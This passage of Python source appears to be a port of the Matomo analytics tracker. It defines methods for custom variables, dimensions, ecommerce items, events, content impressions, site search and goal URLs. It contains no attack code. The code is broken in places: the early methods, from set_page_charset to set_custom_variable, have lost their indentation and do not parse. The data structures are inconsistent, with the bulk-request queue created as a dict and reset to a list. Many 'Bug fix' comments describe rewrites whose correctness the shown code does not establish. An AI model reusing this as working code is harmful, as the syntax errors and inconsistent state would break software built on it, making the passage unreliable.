        self.domCompletionTime = 0
        self.onLoadTime = 0
        self.pageCustomVar = {}
        self.ecommerceView = {}
        self.customParameters = {}
        self.customDimensions = {}
        self.customData = ""
        self.hasCookies = False
        self.token_auth = ""
        self.user_agent = ""
        # Optional geolocation overrides.
        self.country = ""
        self.region = ""
        self.city = ""
        self.lat = 0.0
        self.long = 0.0
        self.width = 0
        self.height = 0
        self.plugins = ""
        self.local_hour = ""
        self.local_minute = ""
        self.local_second = ""
        self.idPageview = ""
        self.id_site = str(id_site)
        self.urlReferrer = self.request.get("HTTP_REFERER", "")
        self.pageCharset = self.DEFAULT_CHARSET_PARAMETER_VALUES
        self.pageUrl = self.get_current_url()
        self.ip = self.request.get("REMOTE_ADDR", "")
        self.accept_language = self.request.get("HTTP_ACCEPT_LANGUAGE", "")
        self.user_agent = self.request.get("HTTP_USER_AGENT", "")
        if api_url:
            self.URL = api_url
        # Life of the visitor cookie (in sec)
        self.configVisitorCookieTimeout = 33955200
        # 13 months (365 + 28 days)
        # Life of the session cookie (in sec)
        self.configSessionCookieTimeout = 1800
        # 30 minutes
        # Life of the referral cookie (in sec)
        self.configReferralCookieTimeout = 15768000
        # 6 months
        # Visitor Ids in order
        self.user_id = ""
        self.forcedVisitorId = ""
        self.cookieVisitorId = ""
        self.randomVisitorId = ""
        self.set_new_visitor_id()
        self.configCookiesDisabled = False
        self.configCookiePath = self.DEFAULT_COOKIE_PATH
        self.configCookieDomain = ""
        self.configCookieSameSite = ""
        self.configCookieSecure = False
        self.configCookieHTTPOnly = False
        self.currentTs = time.time()
        self.createTs = self.currentTs
        # Allow debug while blocking the request
        self.requestTimeout = 600
        self.doBulkRequests = False
        self.storedTrackingActions = {}
        self.sendImageResponse = True
        self.visitorCustomVar = self.get_custom_variables_from_cookie()
        # Cookies exchanged with the tracker on the next request.
        self.outgoingTrackerCookies = {}
        self.incomingTrackerCookies = {}
        self.headersSent = False
        self.proxy = ""
        self.proxy_port = ""
def set_page_charset(self, charset=""):
"""
By default, Matomo expects utf-8 encoded values, for example
for the page URL parameter values, Page Title, etc.
It is recommended to only send UTF-8 data to Matomo.
If required though, you can also specify another charset using this function.
* @param string charset
* @return self
"""
self.pageCharset = charset
return self
def set_url(self, url):
"""
Sets the current URL being tracked
* @param string url Raw URL (not URL encoded)
* @return self
"""
self.pageUrl = url
return self
def set_url_referrer(self, url):
"""
Sets the URL referrer used to track Referrers details for new visits.
* @param string url Raw URL (not URL encoded)
* @return self
"""
self.urlReferrer = url
return self
def set_generation_time(self, time_ms):
"""
This method is deprecated and does nothing. It used to set the time that it took to generate the document on the server side.
* @param int time_ms Generation time in ms
* @return self
* @deprecated this metric is deprecated please use performance timings instead
* @see setPerformanceTimings
"""
return self
def set_performance_timings(self, network=0, server=0, transfer=0, domProcessing=0, domCompletion=0, onLoad=0):
"""
Sets timings for various browser performance metrics.
* @see https://developer.mozilla.org/en-US/docs/Web/API/PerformanceTiming
* @param int network Network time in ms (connectEnd – fetchStart)
* @param int server Server time in ms (responseStart – requestStart)
* @param int transfer Transfer time in ms (responseEnd – responseStart)
* @param int domProcessing DOM Processing to Interactive time in ms (domInteractive – domLoading)
* @param int domCompletion DOM Interactive to Complete time in ms (domComplete – domInteractive)
* @param int onload Onload time in ms (loadEventEnd – loadEventStart)
* @return $this
"""
self.networkTime = network
self.serverTime = server
self.transferTime = transfer
self.domProcessingTime = domProcessing
self.domCompletionTime = domCompletion
self.onLoadTime = onLoad
return self
def clear_performance_timings(self):
"""
Clear / reset all previously set performance metrics.
"""
self.networkTime = 0
self.serverTime = 0
self.transferTime = 0
self.domProcessingTime = 0
self.domCompletionTime = 0
self.onLoadTime = 0
def set_url_referer(self, url):
"""
* @deprecated
* @ignore
"""
self.set_url_referrer(url)
return self
def set_attribution_info(self, json_encoded):
"""
Sets the attribution information to the visit, so that subsequent Goal conversions are
properly attributed to the right Referrer URL, timestamp, Campaign Name & Keyword.
This must be a JSON encoded string that would typically be fetched from the JS API:
matomoTracker.get_attribution_info() and that you have JSON encoded via JSON2.stringify()
If you call enable_cookies() then these referral attribution values will be set
to the 'ref' first party cookie storing referral information.
* @param string json_encoded JSON encoded array containing Attribution info
* @return self
* @throws Exception
* @see def get_attribution_info(self): in https://github.com/matomo-org/matomo/blob/master/js/matomo.js
"""
decoded = json.loads(json_encoded)
if not is_list(decoded):
raise Exception(
f"set_attribution_info() is expecting a JSON encoded string, {json_encoded} given"
)
self.attributionInfo = decoded
return self
def set_custom_variable(self, id, name, value, scope="visit"):
"""
Sets Visit Custom Variable.
See https://matomo.org/docs/custom-variables/
* @param int id Custom variable slot ID from 1-5
* @param string name Custom variable name
* @param string value Custom variable value
* @param string scope Custom variable scope. Possible values: visit, page, event
* @return self
* @throws Exception
"""
if not is_int(id):
raise Exception("Parameter id to set_custom_variable should be an integer")
if scope == "page":
self.pageCustomVar[id] = [name, value]
elif scope == "event":
self.eventCustomVar[id] = [name, value]
elif scope == "visit":
self.visitorCustomVar[id] = [name, value]
else:
raise Exception("Invalid 'scope' parameter value")
return self
def get_custom_variable(self, id, scope="visit"):
    """
    Returns the currently assigned Custom Variable.
    If scope is 'visit', it will attempt to read the value set in the first party cookie created by Matomo Tracker
    (self.request.cookie array).
    * @param int id Custom Variable integer index to fetch from cookie. Should be a value from 1 to 5
    * @param string scope Custom variable scope. Possible values: visit, page, event
    * @throws Exception
    * @return mixed An array with this format: { 0: CustomVariableName, 1: CustomVariableValue } or False
    * @see matomo.js get_custom_variable()
    """
    # Page- and event-scope variables only ever live in memory for the
    # current request; return False when the slot was never set.
    if scope == "page":
        return self.pageCustomVar[id] if id in self.pageCustomVar else False
    elif scope == "event":
        return self.eventCustomVar[id] if id in self.eventCustomVar else False
    else:
        if scope != "visit":
            raise Exception("Invalid 'scope' parameter value")
        # A value set during this request takes precedence over the cookie.
        if self.visitorCustomVar.get(id):
            return self.visitorCustomVar[id]
        cookie_decoded = self.get_custom_variables_from_cookie()
        # NOTE(review): this validation runs only on the cookie fallback
        # path, after the in-memory lookup above, so a non-int id is
        # accepted when the variable was set in-memory.
        if not is_int(id):
            raise Exception("Parameter to get_custom_variable should be an integer")
        # The cookie entry must be a [name, value] pair; anything else is
        # treated as "not set".
        if (
            not is_list(cookie_decoded)
            or id not in cookie_decoded
            or not is_list(cookie_decoded[id])
            or len(cookie_decoded[id]) != 2
        ):
            return False
        return cookie_decoded[id]
def clear_custom_variables(self):
    """
    Clears every Custom Variable that may have been set, in all three scopes
    (visit, page and event). Useful with bulk requests when you wish to reset
    'visit'-scope Custom Variables between actions.
    """
    for attr in ("visitorCustomVar", "pageCustomVar", "eventCustomVar"):
        setattr(self, attr, {})
def set_custom_dimension(self, id, value):
    """
    Sets a specific custom dimension.
    * @param int id id of custom dimension
    * @param str value value for custom dimension
    * @return self
    """
    key = f"dimension{id}"
    self.customDimensions[key] = value
    return self
def clear_custom_dimensions(self):
    """
    Removes every custom dimension previously set via set_custom_dimension().
    """
    self.customDimensions = dict()
def get_custom_dimension(self, id):
    """
    Returns the value of the custom dimension with the given id, or None when
    that dimension was never set.
    * @param int id id of custom dimension
    * @return str|None
    """
    key = f"dimension{id}"
    return self.customDimensions.get(key)
def set_custom_tracking_parameter(self, tracking_api_parameter, value):
    """
    Sets a custom tracking parameter. This is useful if you need to send any tracking parameters for a 3rd party
    plugin that is not shipped with Matomo itself. Please note that custom parameters are cleared after each
    tracking request.

    Parameters named 'dimension<N>' are routed to set_custom_dimension(N, value)
    instead of being stored as plain custom parameters.
    * @param string tracking_api_parameter The name of the tracking API parameter, eg 'bw_bytes'
    * @param string value Tracking parameter value that shall be sent for this tracking parameter.
    * @return self
    * @throws Exception
    """
    # Bug fix: the previous pattern kept PHP-style '/.../' delimiters, which
    # Python's re treats as literal characters, so 'dimensionN' parameters
    # were never detected and ended up in customParameters instead.
    match = re.match(r"^dimension([0-9]+)$", tracking_api_parameter)
    if match:
        # match.group(1) is the dimension index (as a string, like PHP's
        # captured subpattern).
        self.set_custom_dimension(match.group(1), value)
        return self
    self.customParameters[tracking_api_parameter] = value
    return self
def clear_custom_tracking_parameters(self):
    """
    Clears / resets every custom tracking parameter previously registered via
    set_custom_tracking_parameter().
    """
    self.customParameters = dict()
def set_new_visitor_id(self):
    """
    Replaces the current visitor ID with a freshly generated random one and
    drops any forced or cookie-derived visitor ID.
    * @return self
    """
    fresh = uuid.uuid4().hex
    self.randomVisitorId = fresh[: self.LENGTH_VISITOR_ID]
    self.forcedVisitorId = False
    self.cookieVisitorId = False
    return self
def set_id_site(self, id_site):
    """
    Sets the ID of the Matomo site that receives the tracking data.
    * @param int id_site
    * @return self
    """
    self.id_site = id_site
    return self
def set_browser_language(self, accept_language):
    """
    Sets the browser language, used by Matomo to guess the visitor's country
    when GeoIP is not enabled.
    * @param string accept_language For example "fr-fr"
    * @return self
    """
    self.accept_language = accept_language
    return self
def set_user_agent(self, user_agent):
    """
    Sets the User-Agent string, which Matomo uses to detect OS and browser.
    If never called, the current request's User Agent is used instead.
    * @param string user_agent
    * @return self
    """
    self.user_agent = user_agent
    return self
def set_country(self, country):
    """
    Forces the visitor's country. Without this, Matomo infers the country from
    the visitor's IP address or language.
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @param string country
    * @return self
    """
    self.country = country
    return self
def set_region(self, region):
    """
    Forces the visitor's region. Without this, Matomo may infer the region
    from the visitor's IP address (if configured to do so).
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @param string region
    * @return self
    """
    self.region = region
    return self
def set_city(self, city):
    """
    Forces the visitor's city. Without this, Matomo may infer the city from
    the visitor's IP address (if configured to do so).
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @param string city
    * @return self
    """
    self.city = city
    return self
def set_latitude(self, lat):
    """
    Forces the visitor's latitude. Without this, Matomo may infer it from the
    visitor's IP address (if configured to do so).
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @param float lat
    * @return self
    """
    self.lat = lat
    return self
def set_longitude(self, long):
    """
    Forces the visitor's longitude. Without this, Matomo may infer it from the
    visitor's IP address (if configured to do so).
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @param float long
    * @return self
    """
    self.long = long
    return self
def enable_bulk_tracking(self):
    """
    Turns on the bulk request feature: every tracking action is queued until
    do_bulk_track() is called, which then sends all the queued data at once.
    """
    self.doBulkRequests = True
def enable_cookies(
    self, domain="", path="/", secure=False, http_only=False, same_site=""
):
    """
    Enables cookie creation: a first party VisitorId cookie will be set when
    the VisitorId is set or reset.
    * @param string domain (optional) First-party cookie domain.
        Accepted values: example.com, *.example.com (same as .example.com) or subdomain.example.com
    * @param string path (optional) First-party cookie path
    * @param bool secure (optional) Secure flag for cookies
    * @param bool http_only (optional) HTTPOnly flag for cookies
    * @param string same_site (optional) SameSite flag for cookies
    """
    self.configCookiesDisabled = False
    # Normalise the domain (strip wildcard prefix / trailing dot) first.
    self.configCookieDomain = self.domain_fixup(domain)
    self.configCookiePath = path
    self.configCookieSecure = secure
    self.configCookieHTTPOnly = http_only
    self.configCookieSameSite = same_site
def disable_send_image_response(self):
    """
    Makes Matomo respond with an HTTP 204 (No Content) header instead of the
    1x1 tracking gif.
    """
    self.sendImageResponse = False
def domain_fixup(self, domain):
    """
    Normalize a cookie domain: remove a single trailing '.' and the leading
    '*' of a '*.' wildcard prefix (keeping the dot so the cookie matches all
    subdomains), mirroring the PHP tracker's domainFixup().

    Bug fix: str.lstrip("*.") strips a *character set* (any run of '*' and
    '.' characters), not the literal prefix, so it also removed legitimate
    leading dots; str.rstrip(".") removed every trailing dot instead of one.
    * @param string domain
    * @return string
    """
    if domain.endswith("."):
        domain = domain[:-1]
    if domain.startswith("*."):
        domain = domain[1:]
    return domain
def get_cookie_name(self, cookie_name):
    """
    Builds the first-party cookie name: prefix + name + '.' + site id + '.' +
    a 4-character hash of the cookie domain and path.
    * @param string cookie_name
    * @return string
    """
    # Hash the configured cookie domain (falling back to the current host)
    # plus the cookie path; only the first 4 hex chars are used.
    domain = (
        self.get_current_host()
        if self.configCookieDomain == ""
        else self.configCookieDomain
    )
    hash_string = hashlib.sha1(
        domain.encode("utf-8") + self.configCookiePath.encode("utf-8")
    ).hexdigest()[:4]
    # Bug fix: id_site is documented (and set via set_id_site) as an int;
    # concatenating it raw raised TypeError. Convert explicitly.
    return (
        self.FIRST_PARTY_COOKIES_PREFIX
        + cookie_name
        + "."
        + str(self.id_site)
        + "."
        + hash_string
    )
def do_track_page_view(self, document_title):
    """
    Tracks a page view.
    * @param string document_title Page title as it will appear in the Actions > Page titles report
    * @return mixed Response string or True if using bulk requests.
    """
    # Each pageview gets its own random id so actions can be grouped per view.
    self.generate_new_pageview_id()
    return self.send_request(self.get_url_track_page_view(document_title))
def generate_new_pageview_id(self):
    # 6 random hex chars identify the current pageview, matching the JS tracker.
    self.idPageview = uuid.uuid4().hex[0:6]
def do_track_event(self, category, action, name="", value=0):
    """
    Tracks an event.
    * @param string category The Event Category (Videos, Music, Games...)
    * @param string action The Event's Action (Play, Pause, Duration, Add Playlist, Downloaded, Clicked...)
    * @param string name (optional) The Event's object Name (a particular Movie name, or Song name, or File name...)
    * @param float value (optional) The Event's value
    * @return mixed Response string or True if using bulk requests.
    """
    return self.send_request(self.get_url_track_event(category, action, name, value))
def do_track_content_impression(
    self, content_name, content_piece="unknown", content_target=""
):
    """
    Tracks a content impression.
    * @param string content_name The name of the content. For instance 'Ad Foo Bar'
    * @param string content_piece The actual content. For instance the path to an image, video, audio, any text
    * @param string content_target (optional) The target of the content. For instance the URL of a landing page.
    * @return mixed Response string or True if using bulk requests.
    """
    impression_url = self.get_url_track_content_impression(
        content_name, content_piece, content_target
    )
    return self.send_request(impression_url)
def do_track_content_interaction(
    self, interaction, content_name, content_piece="unknown", content_target=""
):
    """
    Tracks a content interaction. An impression must have been tracked first
    with the same content name and piece (see do_track_content_impression()),
    otherwise the interaction will not count.
    * @param string interaction The name of the interaction with the content. For instance a 'click'
    * @param string content_name The name of the content. For instance 'Ad Foo Bar'
    * @param string content_piece The actual content. For instance the path to an image, video, audio, any text
    * @param string content_target (optional) The target the content leading to when an interaction occurs. For instance the URL of a landing page.
    * @return mixed Response string or True if using bulk requests.
    """
    interaction_url = self.get_url_track_content_interaction(
        interaction, content_name, content_piece, content_target
    )
    return self.send_request(interaction_url)
def do_track_site_search(self, keyword, category="", count_results=0):
    """
    Tracks an internal Site Search query, optionally with the Search Category
    and result count. Populates the Actions > Site Search reports.
    * @param string keyword Searched query on the site
    * @param string category (optional) Search engine category if applicable
    * @param int count_results (optional) results displayed on the search result page. Used to track "zero result" keywords.
    * @return mixed Response or True if using bulk requests.
    """
    return self.send_request(
        self.get_url_track_site_search(keyword, category, count_results)
    )
def do_track_goal(self, id_goal, revenue=0.0):
    """
    Records a Goal conversion.
    * @param int id_goal Id Goal to record a conversion
    * @param float revenue Revenue for this conversion
    * @return mixed Response or True if using bulk request
    """
    return self.send_request(self.get_url_track_goal(id_goal, revenue))
def do_track_action(self, action_url, action_type):
    """
    Tracks a download or an outlink.
    * @param string action_url URL of the download or outlink
    * @param string action_type Type of the action: 'download' or 'link'
    * @return mixed Response or True if using bulk request
    """
    # Referrer could be updated to be the current URL temporarily (to mimic JS behavior)
    return self.send_request(self.get_url_track_action(action_url, action_type))
def add_ecommerce_item(self, sku, name="", category="", price=0.0, quantity=1):
    """
    Adds an item to the Ecommerce order.
    This should be called before do_track_ecommerce_order(), or before do_track_ecommerce_cart_update().
    This can be called for each individual product in the cart (or order).
    SKU parameter is mandatory. Other parameters are optional (set to False if value not known).
    Ecommerce items added via this method are automatically cleared when do_track_ecommerce_order() or get_url_track_ecommerce_order() is called.
    * @param string sku (required) SKU, Product identifier
    * @param string name (optional) Product name
    * @param string|array category (optional) Product category, or array of product categories (up to 5 categories can be specified for a given product)
    * @param float|int price (optional) Individual product price (supports integer and decimal prices)
    * @param int quantity (optional) Product quantity. If not specified, will default to 1 in the Reports
    * @throws Exception when sku is empty
    * @return self
    """
    if not sku:
        raise Exception("You must specify a SKU for the Ecommerce item")
    price = self.force_dot_as_separator_for_decimal_point(price)
    # Bug fix: the previous code assigned a single item list to
    # self.ecommerceItems, so every call overwrote the whole collection and
    # only the last product survived. Key items by SKU (as the PHP tracker
    # does) so repeated calls accumulate and a duplicate SKU updates its entry;
    # this also matches the `self.ecommerceItems = {}` resets elsewhere.
    self.ecommerceItems[sku] = [sku, name, category, price, quantity]
    return self
def do_track_ecommerce_cart_update(self, grand_total):
    """
    Tracks a Cart Update (add item, remove item, update item).
    On every Cart update you must call add_ecommerce_item() for each item
    (product) in the cart, including the items that haven't changed since the
    last cart update. Items that were in the previous cart but are not sent in
    later Cart updates will be deleted from the cart (in the database).
    * @param float grand_total Cart grand_total (typically the sum of all items' prices)
    * @return mixed Response or True if using bulk request
    """
    return self.send_request(self.get_url_track_ecommerce_cart_update(grand_total))
def do_bulk_track(self):
    """
    Sends all stored tracking actions at once. Only has an effect if bulk tracking is enabled.
    To enable bulk tracking, call enable_bulk_tracking().
    * @throws Exception when no tracking actions have been queued
    * @return string Response
    """
    if not self.storedTrackingActions:
        raise Exception(
            (
                "Error: you must call the def do_track_page_view or do_track_goal"
                " from this class, before calling this method do_bulk_track():"
            )
        )
    payload = {"requests": self.storedTrackingActions}
    # token_auth is not required by default, except if bulk_requests_require_authentication=1
    if self.token_auth:
        payload["token_auth"] = self.token_auth
    response = self.send_request(
        self.get_base_url(), "POST", json.dumps(payload), force=True
    )
    # Bug fix: the queue is a sequence of request strings (sent as the JSON
    # "requests" array above); resetting it to a dict ({}) broke subsequent
    # appends. Reset to an empty list instead.
    self.storedTrackingActions = []
    return response
def do_track_ecommerce_order(
    self, order_id, grand_total, sub_total=0.0, tax=0.0, shipping=0.0, discount=0.0
):
    """
    Tracks an Ecommerce order.
    If the order contains items (products), call add_ecommerce_item() for each
    item first. All revenues (grand_total, sub_total, tax, shipping, discount)
    are individually summed and reported in Matomo reports. Only order_id and
    grand_total are required.
    * @param string|int order_id (required) Unique Order ID.
        This will be used to count this order only once in the event the order page is reloaded several times.
        order_id must be unique for each transaction, even on different days, or the transaction will not be recorded by Matomo.
    * @param float grand_total (required) Grand Total revenue of the transaction (including tax, shipping, etc.)
    * @param float sub_total (optional) Sub total amount, typically the sum of items prices for all items in this order (before Tax and Shipping costs are applied)
    * @param float tax (optional) Tax amount for this order
    * @param float shipping (optional) Shipping amount for this order
    * @param float discount (optional) Discounted amount in this order
    * @return mixed Response or True if using bulk request
    """
    order_url = self.get_url_track_ecommerce_order(
        order_id, grand_total, sub_total, tax, shipping, discount
    )
    return self.send_request(order_url)
def do_ping(self):
    """
    Sends a ping request.

    Ping requests do not track new actions. When sent within the standard
    visit length (see global.ini.php) they extend the existing visit and the
    current last action for the visit; when sent after the standard visit
    length, they create a new visit using the last action in the last known
    visit.
    * @return mixed Response or True if using bulk request
    """
    ping_url = self.get_request(self.id_site) + "&ping=1"
    return self.send_request(ping_url)
def set_ecommerce_view(self, sku="", name="", category="", price=0.0):
    """
    Sets the current page view as an item (product) page view, or an Ecommerce Category page view.
    This must be called before do_track_page_view() on this product/category page.
    On a category page you may set only the category parameter and leave the others empty.
    Tracking Product/Category page views will allow Matomo to report on Product & Categories
    conversion rates (Conversion rate = Ecommerce orders containing this product or category / Visits to the product or category)
    * @param string sku Product SKU being viewed
    * @param string name Product Name being viewed
    * @param string|array category Category being viewed. On a Product page, this is the product's category.
        You can also specify an array of up to 5 categories for a given page view.
    * @param float price Specify the price at which the item was displayed
    * @return self

    Bug fix: every condition in the previous implementation was inverted
    (`if not category`, `if not price`, `if sku and name`, `if not sku`,
    `if name`), so a supplied category/price was discarded and the SKU/name
    were only recorded when absent. The logic below mirrors the PHP tracker.
    """
    self.ecommerceView = {}
    # Category: JSON-encode arrays, pass strings through, default to "".
    if category:
        if is_list(category):
            category = json.dumps(category)
    else:
        category = ""
    self.ecommerceView["_pkc"] = category
    # Price: recorded only when non-zero, normalised to a dot-decimal string.
    if price:
        price = str(float(price))
        price = self.force_dot_as_separator_for_decimal_point(price)
        self.ecommerceView["_pkp"] = price
    # On a category page, do not record "Product name not defined"
    if not sku and not name:
        return self
    if sku:
        self.ecommerceView["_pks"] = sku
    if not name:
        name = ""
    self.ecommerceView["_pkn"] = name
    return self
def force_dot_as_separator_for_decimal_point(self, value):
    """
    Forces a dot as the decimal separator (a comma would be produced under
    e.g. a German locale). See https://github.com/matomo-org/matomo/issues/6435
    * @param float|string value
    * @return string "" for None/False, otherwise str(value) with ',' -> '.'
    """
    # Identity checks: 0 and "" must NOT be collapsed to "", only None/False.
    unset = value is None or value is False
    return "" if unset else str(value).replace(",", ".")
def get_url_track_ecommerce_cart_update(self, grand_total):
    """
    Returns the URL used to track an Ecommerce Cart update.
    Calling this reinitializes the ecommerceItems collection, so items will
    have to be added again via add_ecommerce_item().
    * @ignore
    """
    return self.get_url_track_ecommerce(grand_total)
def get_url_track_ecommerce_order(
    self, order_id, grand_total, sub_total=0.0, tax=0.0, shipping=0.0, discount=0.0
):
    """
    Returns the URL used to track an Ecommerce Order.
    Calling this reinitializes the ecommerceItems collection, so items will
    have to be added again via add_ecommerce_item().
    * @ignore
    """
    if not order_id:
        raise Exception("You must specify an order_id for the Ecommerce order")
    base = self.get_url_track_ecommerce(
        grand_total, sub_total, tax, shipping, discount
    )
    return base + "&ec_id=" + urlencode_plus(order_id)
def get_url_track_ecommerce(
    self, grand_total, sub_total=0.0, tax=0.0, shipping=0.0, discount=0.0
):
    """
    Returns the URL used to track Ecommerce orders and cart updates.
    Calling this reinitializes the ecommerceItems collection, so items will
    have to be added again via add_ecommerce_item().
    * @ignore

    Bug fix: every amount condition was inverted (`if not X:`) and the URL
    parameters were appended unconditionally, so the amounts were only
    dot-normalised when zero and str-concatenation crashed on float amounts.
    Each optional amount is now normalised and appended only when non-zero,
    mirroring the PHP tracker; the ec_items condition was inverted too.
    """
    if not is_numeric(grand_total):
        raise Exception(
            "You must specify a grand_total for the Ecommerce order (or Cart update)"
        )
    url = self.get_request(self.id_site)
    # idgoal=0 marks the request as an ecommerce conversion.
    url += "&idgoal=0"
    if grand_total:
        grand_total = self.force_dot_as_separator_for_decimal_point(grand_total)
        url += "&revenue=" + grand_total
    if sub_total:
        sub_total = self.force_dot_as_separator_for_decimal_point(sub_total)
        url += "&ec_st=" + sub_total
    if tax:
        tax = self.force_dot_as_separator_for_decimal_point(tax)
        url += "&ec_tx=" + tax
    if shipping:
        shipping = self.force_dot_as_separator_for_decimal_point(shipping)
        url += "&ec_sh=" + shipping
    if discount:
        discount = self.force_dot_as_separator_for_decimal_point(discount)
        url += "&ec_dt=" + discount
    if self.ecommerceItems:
        url += "&ec_items=" + urlencode_plus(json.dumps(self.ecommerceItems))
    # Items are consumed by this request; start the next order/cart empty.
    self.ecommerceItems = {}
    return url
def get_url_track_page_view(self, document_title=""):
    """
    Builds the URL to track a page view.
    * @see do_track_page_view()
    * @param string document_title Page view name as it will appear in Matomo reports
    * @return string URL to matomo.php with all parameters set to track the pageview
    """
    request_url = self.get_request(self.id_site)
    if document_title:
        request_url += "&action_name=" + urlencode_plus(document_title)
    return request_url
def get_url_track_event(self, category, action, name="", value=0):
    """
    Builds the URL to track a custom event.
    * @see do_track_event()
    * @param string category The Event Category (Videos, Music, Games...)
    * @param string action The Event's Action (Play, Pause, Duration, Add Playlist, Downloaded, Clicked...)
    * @param string name (optional) The Event's object Name (a particular Movie name, or Song name, or File name...)
    * @param float value (optional) The Event's value
    * @return string URL to matomo.php with all parameters set to track the pageview
    * @throws Exception when category or action is empty
    """
    url = self.get_request(self.id_site)
    # Category and action are mandatory for the Events API.
    if not len(category):
        raise Exception(
            "You must specify an Event Category name (Music, Videos, Games...)."
        )
    if not len(action):
        raise Exception("You must specify an Event action (click, view, add...).")
    url += "&e_c=" + urlencode_plus(category)
    url += "&e_a=" + urlencode_plus(action)
    if len(name) > 0:
        url += "&e_n=" + urlencode_plus(name)
    if value:
        url += "&e_v=" + str(self.force_dot_as_separator_for_decimal_point(value))
    return url
def get_url_track_content_impression(
    self, content_name, content_piece, content_target
):
    """
    Builds the URL to track a content impression.
    * @see do_track_content_impression()
    * @param string content_name The name of the content. For instance 'Ad Foo Bar'
    * @param string content_piece The actual content. For instance the path to an image, video, audio, any text
    * @param string|False content_target (optional) The target of the content. For instance the URL of a landing page.
    * @throws Exception In case content_name is empty
    * @return string URL to matomo.php with all parameters set to track the pageview
    """
    url = self.get_request(self.id_site)
    if len(content_name) == 0:
        raise Exception("You must specify a content name")
    url += "&c_n=" + urlencode_plus(content_name)
    # Bug fix: the previous checks read `not x and len(x) > 0`, which is a
    # contradiction (always False), so c_p and c_t were silently never sent.
    # Mirror get_url_track_content_interaction(): append them when non-empty.
    if content_piece and len(content_piece) > 0:
        url += "&c_p=" + urlencode_plus(content_piece)
    if content_target and len(content_target) > 0:
        url += "&c_t=" + urlencode_plus(content_target)
    return url
def get_url_track_content_interaction(
    self, interaction, content_name, content_piece, content_target
):
    """
    Builds the URL to track a content interaction.
    * @see do_track_content_interaction()
    * @param string interaction The name of the interaction with the content. For instance a 'click'
    * @param string content_name The name of the content. For instance 'Ad Foo Bar'
    * @param string content_piece The actual content. For instance the path to an image, video, audio, any text
    * @param string|False content_target (optional) The target the content leading to when an interaction occurs. For instance the URL of a landing page.
    * @throws Exception In case interaction or content_name is empty
    * @return string URL to matomo.php with all parameters set to track the pageview
    """
    url = self.get_request(self.id_site)
    # Interaction and content name are mandatory.
    if not len(interaction):
        raise Exception("You must specify a name for the interaction")
    if not len(content_name):
        raise Exception("You must specify a content name")
    url += "&c_i=" + urlencode_plus(interaction)
    url += "&c_n=" + urlencode_plus(content_name)
    # Piece and target are optional; only appended when non-empty.
    if content_piece and len(content_piece) > 0:
        url += "&c_p=" + urlencode_plus(content_piece)
    if content_target and len(content_target) > 0:
        url += "&c_t=" + urlencode_plus(content_target)
    return url
def get_url_track_site_search(self, keyword, category, count_results):
    """
    Builds the URL to track a site search.
    * @see do_track_site_search()
    * @param string keyword
    * @param string category
    * @param int count_results result count; an explicit 0 tracks "zero result" keywords
    * @return string
    """
    url = self.get_request(self.id_site)
    url += "&search=" + urlencode_plus(keyword)
    if len(category) > 0:
        url += "&search_cat=" + urlencode_plus(category)
    # Bug fix: the previous negated condition (`if not count_results or
    # count_results == 0`) sent the count only when it was missing/zero,
    # dropped every real count, and crashed on int(None). Send it whenever a
    # count was supplied, including an explicit 0 ("zero result" keywords).
    if count_results or count_results == 0:
        url += "&search_count=" + str(int(count_results))
    return url
def get_url_track_goal(self, id_goal, revenue=0.0):
    """
    Builds the URL to track a goal with id_goal and revenue.
    * @see do_track_goal()
    * @param int id_goal Id Goal to record a conversion
    * @param float revenue Revenue for this conversion
    * @return string URL to matomo.php with all parameters set to track the goal conversion
    """
    url = self.get_request(self.id_site)
    # Bug fix: id_goal is documented as an int; concatenating it raw raised
    # TypeError. Convert explicitly.
    url += "&idgoal=" + str(id_goal)
    if revenue:
        revenue = self.force_dot_as_separator_for_decimal_point(revenue)
        url += "&revenue=" + revenue
    return url
def get_url_track_action(self, action_url, action_type):
    """
    Builds the URL to track a new action (download or outlink).
    * @see do_track_action()
    * @param string action_url URL of the download or outlink
    * @param string action_type Type of the action: 'download' or 'link'
    * @return string URL to matomo.php with all parameters set to track an action
    """
    base = self.get_request(self.id_site)
    return base + "&" + action_type + "=" + urlencode_plus(action_url)
def set_force_visit_date_time(self, date_time):
    """
    Overrides the server date and time for the tracking requests, allowing
    visits in the past to be recorded. All times are in UTC.
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @see set_token_auth()
    * @param string date_time Date with the format '%y-%m-%d %H:%M:%S', or a UNIX timestamp.
        If the datetime is older than one day (default value for tracking_requests_require_authentication_when_custom_timestamp_newer_than), then you must call set_token_auth() with a valid Admin/Super user token.
    * @return self
    """
    self.forcedDatetime = date_time
    return self
def set_force_new_visit(self):
    """
    Forces Matomo to create a new visit for the tracking request (by default a
    new visit is only created when the user's last request was more than 30
    minutes ago). Call before any doTrack* method.
    * @return self
    """
    self.forcedNewVisit = True
    return self
def set_ip(self, ip):
    """
    Overrides the visitor's IP address.
    Allowed only for Admin/Super User, must be used along with set_token_auth().
    * @see set_token_auth()
    * @param string ip IP string, eg. 130.54.2.1
    * @return self
    """
    self.ip = ip
    return self
def set_user_id(self, user_id):
    """
    Force the action to be recorded for a specific User. The User ID is a string representing a given user in your system.
    A User ID can be a username, UUID or an email address, or any number or string that uniquely identifies a user or client.
    * @param string user_id Any user ID string (eg. email address, ID, username). Must be non empty. Set to False to de-assign a user id previously set.
    * @return self
    * @throws Exception when user_id is an empty string
    """
    # Bug fix: the previous `if not user_id` check raised on False too,
    # contradicting the documented "Set to False to de-assign" contract
    # (the PHP tracker only rejects the empty string).
    if user_id == "":
        raise Exception("User ID cannot be empty.")
    self.user_id = user_id
    return self
def get_user_id_hashed(self, id):
    """
    Hash function used internally by Matomo to hash a User ID into the Visitor ID.
    Note: matches implementation of Tracker Request.get_user_id_hashed()
    * @param id User ID (str is UTF-8 encoded before hashing; bytes are hashed as-is)
    * @return string first 16 hex characters of the SHA-1 digest
    """
    # Bug fix: hashlib.sha1() requires bytes, but User IDs are passed around
    # as str in this API, which raised TypeError. Encode str input first.
    if isinstance(id, str):
        id = id.encode("utf-8")
    return hashlib.sha1(id).hexdigest()[:16]
def set_visitor_id(self, visitor_id):
    """
    Forces the requests to be recorded for the specified Visitor ID, instead
    of letting Matomo attribute the user heuristically (IP and other
    fingerprinting attributes). If not set, the visitor ID is fetched from the
    1st party cookie, or set to a random UUID.
